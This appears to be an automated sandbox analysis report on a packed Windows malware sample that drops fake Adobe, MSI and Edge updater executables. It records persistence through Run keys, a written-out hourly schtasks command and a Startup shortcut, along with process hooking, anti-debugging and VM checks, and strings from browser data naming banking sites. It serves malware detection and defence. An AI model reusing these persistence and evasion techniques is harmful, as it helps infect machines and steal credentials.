Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: EdgeMS2.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 3723696 > 1048576
Source: file.exe Static PE information: Raw size of .vmp,,,2 is bigger than: 0x100000 < 0x386c00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Unpacked PE file: 8.2.IHobmyUUXF8jFZ9HHCK7.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 11.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 12.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 13.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Unpacked PE file: 20.2.RthubJXJJOhKyKgs0z_b.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 21.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 22.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 25.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 30.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 33.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 38.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Unpacked PE file: 41.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 44.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068FC990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_068FC990
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp,,,2
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .vmp,,,0
Source: file.exe Static PE information: section name: .vmp,,,1
Source: file.exe Static PE information: section name: .vmp,,,2
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: IHobmyUUXF8jFZ9HHCK7.exe.0.dr Static PE information: section name: .MPRESS1
Source: IHobmyUUXF8jFZ9HHCK7.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS2
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: RthubJXJJOhKyKgs0z_b.exe.0.dr Static PE information: section name: .MPRESS1
Source: RthubJXJJOhKyKgs0z_b.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: oobeldr.exe.8.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.8.dr Static PE information: section name: .MPRESS2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008985FD push ebp; iretd 0_2_007D90A7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0071A6FC push ds; iretd 0_2_0071A71E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0071A716 push ds; iretd 0_2_0071A71E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0080E834 push ds; iretd 0_2_0080E8AD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B4C21 push es; ret 0_2_008B4C48
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00740C96 push cs; iretd 0_2_008C547E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0080908A push 1EA38640h; iretd 0_2_008090CB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00593F49 push ecx; ret 0_2_00593F5C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00801F18 pushad ; ret 0_2_00801F37
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0693E710 push es; retf 0000h 0_2_0693E8C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0693E5CB push es; iretd 0_2_0693E70C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0693C245 push esi; ret 0_2_0693C24E
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Code function: 8_2_006D50A5 push ebp; ret 8_2_00721C57
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\l2[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\k[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\RthubJXJJOhKyKgs0z_b.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\span8fTqI7Z4TQTK\IHobmyUUXF8jFZ9HHCK7.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: DF0005 value: E9 2B BA 63 76 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 7742BA30 value: E9 DA 45 9C 89 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 1140008 value: E9 8B 8E 33 76 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 77478E90 value: E9 80 71 CC 89 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 1160005 value: E9 8B 4D AA 75 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 76C04D90 value: E9 7A B2 55 8A Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 1170005 value: E9 EB EB AA 75 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 76C1EBF0 value: E9 1A 14 55 8A Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 1180005 value: E9 8B 8A 70 75 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 76888A90 value: E9 7A 75 8F 8A Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 1190005 value: E9 2B 02 72 75 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 5316 base: 768B0230 value: E9 DA FD 8D 8A Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0064B500 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0064B500
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to implement multi-threaded time evasion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068FC230 CreateThread,Sleep, call eax 0_2_068FC230
Found stalling execution ending in API Sleep call
Source: C:\Users\user\Desktop\file.exe Stalling execution: Execution stalls by calling Sleep
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0084C590 rdtsc 0_2_0084C590
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 8084 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1122 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 9995
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 6396 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3232 Thread sleep time: -807000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6396 Thread sleep time: -8084000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3232 Thread sleep time: -3366000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 1440 Thread sleep count: 9995 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 1440 Thread sleep time: -2248875s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\file.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006233B0 CreateDirectoryA,FindFirstFileA, 0_2_006233B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00591F8C FindFirstFileExW,GetLastError, 0_2_00591F8C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0079CBCC FindFirstFileExW, 0_2_0079CBCC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06936276 VirtualQuery,GetSystemInfo, 0_2_06936276
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 30000 Jump to behavior
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: file.exe, 00000000.00000003.1441495454.0000000006215000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Dk&Ven_VMware&P
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: discord.comVMware20,11696494690f
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}D
Source: file.exe, 00000000.00000002.3807052921.000000000122C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000002.3807052921.000000000125B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442348203.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2660139988.000000000125B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441917639.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441725385.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442821910.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1443357927.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441605252.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3807052921.000000000121A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: file.exe, 00000000.00000002.3809268404.000000000622B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_6C5DD4F2
Source: file.exe, 00000000.00000003.2659946662.0000000005E0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: file.exe, 00000000.00000002.3809268404.000000000622B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_6C5DD4F2=
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: file.exe, 00000000.00000002.3807052921.00000000011C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: file.exe, 00000000.00000002.3809134733.0000000005DFF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.1366252933.000000000122F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}=
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: file.exe, 00000000.00000003.2660139988.000000000125B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}e
Source: file.exe, 00000000.00000002.3808658828.0000000005DAD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000001.19041.2006_none_d94bc80de1097097\gdiplus.dll
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: global block list test formVMware20,11696494690
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: ElGSHigIWc8DWeb Data.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0084C590 rdtsc 0_2_0084C590
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0690E580 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW, 0_2_0690E580
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068FC990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_068FC990
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00624130 mov eax, dword ptr fs:[00000030h] 0_2_00624130
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068DE3B5 GetHGlobalFromStream,GlobalSize,GlobalLock,VirtualAlloc,RtlGetCompressionWorkSpaceSize,RtlCompressBuffer,GlobalUnlock,GdipDisposeImage,GetProcessHeap,HeapAlloc, 0_2_068DE3B5
